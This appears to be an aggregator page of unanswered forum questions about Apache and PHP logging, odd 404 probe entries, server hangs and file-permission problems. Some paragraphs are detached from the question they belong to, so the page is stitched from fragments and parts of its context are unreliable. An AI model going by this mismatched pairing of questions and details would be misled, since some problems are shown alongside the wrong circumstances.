Apache Frequently Unresponsive And Strage Error Log Entry Looking For Mdqt.php
Many a times websites hosted on my Red Hat Linux server would not open even though Apache and everthing else is up and running. When i hit reload on browser 4-5 times the website would load or i have to restart Apache and everything starts working normally.

Today when this problem resurfaced i did not restart Apache and looked for in apache logs and saw this strange entry in apache Error Log;

[client my.ip.xx.xx] script '/my/website/httproot/mdqt.php' not found or unable to stat

The above was in apache Error Log, above is my ip address, and i never requested a file named mdqt.php, in fact no file by the name mdqt.php even exist on my entire server.

I then looked for mdqt.php in error logs and saw several requests made for this file and from various IP addresses.

i understand this is what causes my http to die.

Apache Error Log: Log Files That Exist
I have moved my sites from old server with Apache 1.3 to new one with Apache 2.2.4. Since that time, the error log is full of these lines:

Code:
[Wed Jul 04 05:36:32 2007] [error] [client 212.47.9.194] File does not exist: /home/domain/public_html/russia
[Wed Jul 04 05:36:39 2007] [error] [client 212.47.9.194] File does not exist: /home/domain/public_html/russia
[Wed Jul 04 05:36:45 2007] [error] [client 213.192.18.2] File does not exist: /home/domain/public_html/italy
[Wed Jul 04 05:36:57 2007] [error] [client 83.8.104.181] File does not exist: /home/domain/public_html/mexico
The access logs show even more accesses, so sometimes the same page is ok, sometimes it is logged here. The strange thing is that these files (pages) exist! They are accessible through the browser without any problem.

Do you have any idea where could be the problem? It would helped me lot, I am unable to find any real problem now, when error log is full of these.

My OS is Ubuntu 6.06. I use mod_rewrite through .htaccess. I can provide list of apache modules, if it helps.

the directory: /usr/local/apache2/php/logs is already exist but not the php_error_log

the directory already chmod'ed 644 and owned by root. my apache log directory is also owned by root and the error logging is running just fine.

How To Write Cookie Data To Web Log File
I use a persistent and session cookie in order to help track return visitors, latent conversions and keyword tracking. My problem is that my hosting company, BlueHost, does not allow me to write the cookie data to my raw access log which would enable me to analyze this information.

Does anyone have any experience with using a script in order to get around this issue and write the cookie data to my log file....or as an alternative can people recommend a good hosting company which enables this functionality?

BlueHost has generally worked fine, so a work-around would be preferred, but if needed I may switch.

Should I be worried about this? It appears ( according to me ) that he keeps getting 404 errors ans is not actually doing anything other than trying to request false pages?

Please note that the file he is "GET"ing does not exist on the server at all.

Viewing An Apache Log
I downloaded an Apache log for my site in the .gz format on a Windows XP laptop.

How can I view it? Are there any text editors or special log viewers that will allow me to view the file. Or does it need to be unzipped because it's a .gz file?

Php Error Log
these are in my php.ini:

error_reporting = E_ALL & ~E_NOTICE
display_errors = Off
log_errors = On
error_log = /var/log/php_log

I tried setting up a test.php (which contains php error).

When I try to access the file via root command:

php -e test.php

The error gets logged into /var/log/php_log.

The problem is when I access this file via web, the error does not get logged into /var/log/php_log

Is This A Dangerous Php Log
i have an image hosting and i am using curl for remote upload, everyday i am checking php error logs to see is there any bug in codes or no. today i found an unusual log!

Apache Log 404-security
I have a freshly installed Redhat Enterprise 5 box running Apache/MySQL/PHP. Currently it is only hosting the Red Hat default server page and I've noticed a few strange entries in the apache log file. For example there is this:

xx.xxx.xxx.x - - [17/Feb/2008:16:25:37 -0500] "GET xxxx://xxx.xxxx***********/xxx.php xxxx/1.1" 404 289 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

I edited out the IP and domain but neither belong to me. Do I have a security problem here with my server?

Changing Access_log Filename In Logrotate
how to rename access logs according to Week Number?

I notice that 1&1 do this, producing a file like "access.log.31.gz".
I'd like the access log to be in this format: access_log_[domain-name]_[Week-Number].gz, or if domain-name is not possible: access_log_[Week-Number].gz

Here's my current logrotate script for access_log:

Code:
/home/default/muro.co.uk/user/logfiles/access_log {
missingok
rotate 8
weekly
postrotate
/bin/kill -USR1 `cat /var/run/httpd.pid`
endscript
}

Hacker Detection On Apache Log Files
I have a client that is certain someone is trying to hack her web-portal. I need to set up something that will alert me on suspicious activity on the server. For example someone fiddling with requests trying to make SQL / shell .. injection and similar threats.

Does any tool (for example bash script with grep) exist that would parse the raw apache logs and report if something is suspicious. Apache logs don't show the POST data so I am talking to admin to setup dump_io apache mod that enables this.

Or am I going into wrong direction here and there is whole another way to do this? I searched the web and forums for anything like this and didn't find anything.

Where Does Linux/apache/centos Log Protection Faults
Anytime I've gotten these before, they were stored in:
/var/log/messages

Today (according to logwatch), I got a protection fault in "top".

But when I view /var/log/messages... nothing is there relating to a fault.

The only kernel message that appears is a martian source.

I also hadn't logged into ssh today, isn't "top" an ssh command.

WHM 11.15.0 cPanel 11.18.3-C21703

CENTOS Enterprise 4.6 i686 on standard - WHM X v3.1.0

Few days ago i upgraded cPanel, and then Apache, PHP5, eAccelerator, hadn't updated in ages.

Server worked lightning fast compared to old (PHP 4, older Apache, no eAccelerator), and seemed stable.

Few hours later, server is unresponsive, it took over a day to get the server on the status that i can even see what's happening!

Downgraded back to PHP4, removed suhosin. Still happens. Reworked all the configs, and took all resource limits so low that it survives that, PRM gives 12secs time, enough apache processes etc. Maximum clients lowered to 50 etc. you get the general feel what i did, just to see what's going on.

Now the server survives those 2200+ processes somehow and comes back responsive in some minutes. Killing all PHP processes alone does not solve the problem, but need to restart other services too. All services tend to start crashing when this happens.

Thing is, they are specific user PHP processes, ALL of them, and thus HTTP Request (suPHP), but no log entries for those, i do not see where from they originate, what PHP files are being requested, reworking individual PHP files for that account didn't help at all etc.

I cannot just suspend this account, it's an high importance account for my own needs.

This account gets ~2½million requests a month regularly, and server can handle that.

There was one new reseller account setup for someone else the day this started happening (i upgraded to PHP5 just after accoutn creation) but i think that's unrelated.

Any ideas how to start pursuing a resolution for this? It has started happening more frequently than before, so i'm also suspecting a DDoS, ubt there should be log entries.

Is it possible the requests come so fast that Apache just don't have the time needed to write log?

HDD is the bottleneck actually on this server (ty Leaseweb, you guys gave me the worst HDD of the size you could find and want to charge 25euros a month extra for a proper HDD of same size, 250gb!)

Php Includes Issue On Linux Server With Apache 2.0.63 / Php 5.2.6
I am having some trouble with getting 'include' working. I have a new dedicated server running Apache 2.0.63 and PHP 5.2.6. Local includes on the same domain are running ok, but remote includes are throwing a problem. On the many sites we plan to host on this servber we use a central 'webmaster' page called as an include from a specific site (also on the same server).

I need to edit the PHP.ini and /or recompile the PHP with the appropriate modules to do one of the following...

1 (ideally) - allow includes from any site that is held on this dedicated server

2. allow includes from specified websites

3. simply allow remote includes

right settings to get one of these

options running and solve my problem?

Apache/MySQL/PHP Issue - PHP Not Loading
I've got a server that was running Apache 2.0/PHP 5.2.5 & MysQL 5.0 just fine, however I needed to upgrade to a newer version of MySQL.

So I uninstalled MySQL 5.0 and installed MySQL 5.1, copied the MySQLlibs over, and recompiled Apache/PHP with easyupdate. Apache & MysQL both start/run fine without errors, however PHP files don't load. Just get black pages (HTML works fine obviously).

I went ahead and updated to Apache 2.2 & PHP 5.2.6 while I was at it, but that doesn't change things. I'm not sure why uninstalling MysQL & reinstalling would break any dependencies, but looks like thats the case. Perhaps I need to reinstall some libraries?

Or would it be easier just to reinstall Apache/PHP entirely? I have no data.

How To Generate PHP Error.log Files In The Directory Of Error
unable to get any php5 error logs

Here are my settings in the /etc/php5/apache2/php.ini file:

display_errors = On
display_startup_errors = Off
log_errors = On
log_errors_max_len = 1024
ignore_repeated_errors = Off
ignore_repeated_source = Off
report_memleaks = On
error_log = /var/log/php5/error.log

However unfortunately I never see any error log being generated in the /var/log/php5/error.log file?

Also with my shared hosting site one thing which I noticed was, due to some configurations set by them, the error.log used to generate in the folder where the error occured. This is a cool thing which they used to do, but I just dont understand how did they do that.

Apache File Access
I'm trying to set up Apache on CentOS 4. I'm using Apache 2.0 and it can't seem to access anything outside of the /var/www directory - it gives an Error 403.

I thought this would be down to SELinux but this is disabled. I've run the following command on the directory but with no luck:

Code:
chown apache /home/jmaskell -R

Php File Corruption
I have a Linux VPS with Liquidweb which is working fine except for one problem:

On one domain I have a shopping cart (a highly modded CubeCart).

A number of the files are encrypted php files (part of the extensive mods).

For several weeks all will work fine, then out of the blue, the cart will stop working because a number of the encrypted files have become corrupt. The result is either a totally blank page or a 'checksum error'.

Uploading the files from a local backup fixes things for another few days or weeks.

I have no idea why this is happening, or what triggers it, so if anyone can point me in the right direction to find out what is behind the problem, I would greatly appreciate it.

The server uses PHP 5.2.x
